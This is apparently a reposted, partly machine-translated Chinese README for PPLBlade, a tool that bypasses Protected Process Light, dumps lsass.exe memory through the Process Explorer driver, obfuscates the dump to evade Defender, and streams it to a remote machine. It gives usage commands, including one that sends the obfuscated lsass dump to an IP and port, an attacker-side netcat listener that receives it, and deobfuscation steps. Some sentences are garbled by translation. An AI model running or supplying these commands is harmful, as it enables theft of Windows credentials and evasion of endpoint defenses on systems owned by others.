PPLBLADE-受保护的过程Dumper工具

[taibeihacker]

受保护的进程dumper工具，该工具支持混淆内存转储并将其传输到远程工作站，而无需将其放在磁盘上。
Key functionalities:
绕过PPL保护混淆内存转储文件，以逃避基于防御者签名的检测机制，使用RAW和SMB上传方法上传内存转储，而无需将其放在该工具中使用的技术概述（无归档转储），可以在此处找到。 https://tastypepperon.medium.com/by...ump-dectection-and-ppl-ppl-in-go-7DD85D9A32E6
请注意，procexp15.sys在源文件中列出以进行编译。它不需要与pplblade.exe一起在目标机上传输。
它已经嵌入到pplblade.exe中。利用仅是一个可执行的。
Modes:
Dump- Dump process memory using PID or Process NameDecrypt- Revert obfuscated(--obfuscate) dump file to its original stateCleanup- Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)DoThatLsassThing- Dump lsass.exe using Process Explorer driver (basic poc)Handle ModeS:
Direct-使用openprocess（）函数直接打开Process_all_access hander，使用procexp152.sys获得句柄Procexp基本POC，用于使用Procexp152.Sys将procexp1522.
pplblade.exe - 模式dothatlsassthing（请注意，它不XOR转储文件，提供一个额外的混淆标志来启用XOR功能）
将混淆的LSASS转储上传到远程位置:
pplblade.exe - 模式转储-name lsass.exe -handle过程- obfuscate -dumpmode网络- network raw -ip 192.168.1.17-port 1234攻击者host :
NC -LNP 1234 LSASS.DMP
python3 deobfuscate.py-dumpname lsass.dmp deobfuscate内存dump:
pplblade.exe - 模式descrypt -dumpName pplblade.dmp-key pplblade